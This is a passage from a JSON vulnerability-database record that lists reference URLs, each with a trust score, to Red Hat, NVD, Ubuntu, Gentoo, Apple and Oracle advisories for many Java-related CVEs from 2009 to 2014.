"https://www.redhat.com/security/data/cve/cve-2013-2451.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2464.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2466.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2437.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-2442.html" }, { "trust": 0.2, "url": "http://www.ubuntu.com/usn/usn-1907-1" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/1907-1/" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=29704" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3574" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3565" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0864" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3553" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2443" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1717" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1716" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0505" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2419" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2414" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-3829" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5829" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5804" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1485" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5806" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5087" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0865" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4471" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5075" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3557" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2426" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-4002" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5084" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1711" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1478" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5820" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4540" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0441" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5823" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2421" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0870" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3554" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0862" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1713" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0706" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0434" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5784" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5830" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5800" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3567" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2456" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5803" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4472" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5086" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3556" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0425" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2383" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2447" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2445" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5778" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5780" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5073" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3568" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1493" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5069" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-5035" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3541" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3566" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3549" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1500" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3562" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3571" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2009-3555" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0426" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5850" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2783" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3573" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3552" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0451" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0459" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2423" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-1876" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2384" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0431" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3521" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0401" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5085" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2407" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2421" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3564" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2429" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3569" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2403" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5068" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5071" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2398" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0432" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0815" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0444" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1475" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0497" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5774" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5782" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3554" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4469" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1725" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5790" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5805" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3564" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5802" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1719" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3569" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3573" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0461" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0442" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2458" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0427" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3548" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2427" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5825" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0506" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1484" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2430" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3541" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3549" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3565" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0872" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3216" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0429" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1718" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5772" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3860" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3422" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0433" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5074" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3554" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3574" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2454" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2444" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5072" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4470" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2436" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-4416" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0822" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1537" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3553" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2449" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0503" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0025" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2457" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1476" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0169" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3563" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0809" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5077" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0435" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3544" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0456" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1723" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1726" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0450" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1571" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0460" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5081" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5840" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2465" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2431" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2473" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-6629" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5783" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4448" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-2783" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2463" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3560" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2412" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5809" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1480" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-4351" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2420" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0501" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0428" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0869" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2417" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2471" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3566" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2424" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5076" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5842" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-2397" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0452" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3553" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1569" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1724" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3558" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5797" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5070" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1486" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2472" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0446" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0453" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2010-3860" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1488" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-0502" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-0868" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0440" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0443" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2011-3389" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5814" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5817" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-4351" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3551" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2455" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-3557" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5089" }, { "trust": 0.1, "url": "http://icedtea.classpath.org/hg/release/icedtea7-2.3/file/icedtea-2.3.10/news" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2013-0958.html" }, { "trust": 0.1, "url": "http://support.apple.com/kb/ht1222" }, { "trust": 0.1, "url": "https://www.oracle.com/technetwork/java/javase/releasenotes-136954.html" }, { "trust": 0.1, "url": "http://www.apple.com/support/downloads/" }, { "trust": 0.1, "url": "https://www.apple.com/support/security/pgp/" }, { "trust": 0.1, "url": "http://gpgtools.org" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0451.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0449.html" }, { "trust": 0.1, "url": "https://access.redhat.com/site/articles/11258" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5896.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5817.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0452.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5797.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2428.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0428.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-0414.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5910.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0446.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5782.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5802.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5803.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5832.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5778.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5823.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5899.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5783.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0457.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5801.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5780.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2420.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-2409.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-6629.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0416.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0453.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-6954.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5818.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5824.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5789.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-3743.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0403.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5850.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5812.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5842.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0422.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5902.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5849.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-0368.html" }, { "trust": 0.1, "url": 